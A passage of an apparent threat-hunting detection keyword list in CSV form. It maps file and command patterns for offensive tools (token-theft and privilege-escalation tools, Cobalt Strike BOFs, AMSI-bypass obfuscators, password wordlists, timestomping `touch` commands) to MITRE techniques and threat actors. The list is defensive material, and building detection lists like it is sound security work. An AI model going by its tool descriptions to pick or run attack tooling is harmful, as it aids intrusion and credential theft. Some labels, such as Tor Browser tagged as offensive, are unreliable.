Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*TokenTactics.psm1*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*TokenTactics-main.zip*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*Tokenvator*,offensive_tool_keyword,Tokenvator,A tool to alter privilege with Windows Tokens,T1055 - T1003 - T1134,TA0004 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator*.exe*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator.csproj*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator.exe*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator.git*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator.pdb*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator.Plugins*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator.Resources*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator.sln*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*Tokenvator/MonkeyWorks*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*token-vault steal*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,0,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*token-vault.cna*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,1,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*token-vault.x64.o*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,1,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*token-vault.x86.o*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,1,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*TokenViewer.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*tokyoneon/Chimera*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*tomcarver16/ADSearch*,offensive_tool_keyword,adsearch,A tool to help query AD via the LDAP protocol,T1087 - T1069.002 - T1018,TA0003 - TA0002 - TA0007,N/A,N/A,Reconnaissance,https://github.com/tomcarver16/ADSearch,1,1,N/A,N/A,4,370,44,2023-07-07T14:39:50Z,2020-06-17T22:21:41Z -*tomcat_mgr_default_userpass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*tomcat-rootprivesc-deb.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*tomcatWarDeployer -v -x -p * -H * ,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Tool-PassView*,offensive_tool_keyword,Tool-PassView,Password recovery or exploitation,T1003 - T1021 - T1056 - T1110 - T1212,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/password_recovery_tools.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*tools/adfind*,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*tools/ligolo*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*top100_sublist.txt*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,0,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*top1000_sublist.txt*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,0,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*Top109Million-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top12Thousand-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top1575-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top1pt6Million-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top207-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top29Million-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top2Billion-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top304Thousand-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top353Million-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*topotam.exe*,offensive_tool_keyword,petipotam,PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.,T1557.001 - T1021,TA0008,N/A,N/A,Network Exploitation tools,https://github.com/topotam/PetitPotam,1,1,N/A,N/A,10,1590,272,2023-07-23T17:07:07Z,2021-07-18T18:19:54Z -*topotam/PetitPotam*,offensive_tool_keyword,petipotam,PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.,T1557.001 - T1021,TA0008,N/A,N/A,Network Exploitation tools,https://github.com/topotam/PetitPotam,1,1,N/A,N/A,10,1590,272,2023-07-23T17:07:07Z,2021-07-18T18:19:54Z -*tor_hiddenservices.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*tor_services.py*,offensive_tool_keyword,Tor,Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion - Data Exfiltration,https://github.com/r0oth3x49/Tor,1,1,N/A,N/A,2,148,44,2018-04-21T10:55:00Z,2016-09-22T11:22:33Z -*TORAnonymizer.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*TorBrowser-*macos_ALL.dmg*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*torbrowser-install-*_ALL.exe,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*torbrowser-install-win*.exe*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*tor-browser-linux*_ALL.tar.xz*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*torproject*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*torproject.org/dist/torbrowser/*.*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*--tor-proxy*--pwndb*,offensive_tool_keyword,SocialPwned,SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.,T1596,TA0002,N/A,N/A,OSINT exploitation tools,https://github.com/MrTuxx/SocialPwned,1,1,N/A,N/A,9,800,93,2023-08-12T21:59:23Z,2020-04-07T22:25:38Z -*TorPylle*,offensive_tool_keyword,TorPylle,A Python / Scapy implementation of the OR (TOR) protocol.,T1573 - T1572 - T1553 - T1041 - T1090,TA0002 - TA0040,N/A,N/A,Sniffing & Spoofing,https://github.com/cea-sec/TorPylle,1,0,N/A,N/A,1,91,23,2021-10-03T18:08:41Z,2013-07-23T11:38:39Z -*TorServiceSetup*,offensive_tool_keyword,Tor,Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion - Data Exfiltration,https://github.com/r0oth3x49/Tor,1,0,N/A,N/A,2,148,44,2018-04-21T10:55:00Z,2016-09-22T11:22:33Z -*totally legit pdf.pdf*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*toteslegit.ps1*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*touch -a*,greyware_tool_keyword,touch,Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.,T1070.006 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*touch -m*,greyware_tool_keyword,touch,Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.,T1070.006 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*touch -r *,greyware_tool_keyword,touch,Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.,T1070.006 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*touch -t *,greyware_tool_keyword,touch,Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.,T1070.006 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*tplmap*,offensive_tool_keyword,tplmap,Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system. The sandbox break-out techniques came from James Ketts Server-Side Template Injection: RCE For The Modern Web App. other public researches [1] [2]. and original contributions to this tool It can exploit several code context and blind injection scenarios. It also supports eval()-like code injections in Python. Ruby. PHP. Java and generic unsandboxed template engines.,T1059 - T1210.001 - T1589 - T1175,TA0002 - TA0007 - TA0008 - ,N/A,N/A,Web Attacks,https://github.com/epinna/tplmap,1,0,N/A,N/A,10,3437,670,2023-08-31T14:59:40Z,2016-07-06T20:33:18Z -*trailofbits/onesixtyone*,offensive_tool_keyword,onesixtyone,Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://github.com/trailofbits/onesixtyone,1,1,N/A,N/A,5,416,86,2023-04-11T18:21:38Z,2014-02-07T17:02:49Z -*trainr3kt/MemReader_BoF*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/MemReader_BoF,1,1,N/A,10,10,26,3,2022-05-12T18:46:02Z,2021-04-21T20:51:25Z -*trainr3kt/Readfile_BoF*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/Readfile_BoF,1,1,N/A,10,10,17,4,2022-06-21T04:50:39Z,2021-04-01T03:47:56Z -*traitor -a *,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation 